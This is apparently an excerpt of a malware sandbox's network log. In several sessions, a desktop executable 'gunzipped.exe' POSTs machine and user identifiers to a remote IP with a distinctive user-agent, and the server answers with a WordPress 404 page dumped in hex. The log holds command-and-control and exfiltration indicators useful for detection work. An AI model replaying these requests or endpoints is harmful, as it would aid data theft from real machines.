Apr 17, 2024 03:17:02.374531984 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49713	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:02.984312057 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:03.192660093 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:04.104320049 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:03 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:04.104433060 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:04.104473114 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:04.104511023 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:04.104554892 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:04.104598045 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:04.104636908 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:04.104676962 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:04.104712963 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:04.104753017 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49714	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:04.956656933 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:05.164978981 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:06.781816959 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:05 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:06.781882048 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:06.781920910 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:06.781960011 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:06.781997919 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:06.782037020 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:06.782074928 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:06.782119036 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:06.782155991 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:06.782196999 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49716	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:07.139175892 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:07.347666025 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:08.247116089 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 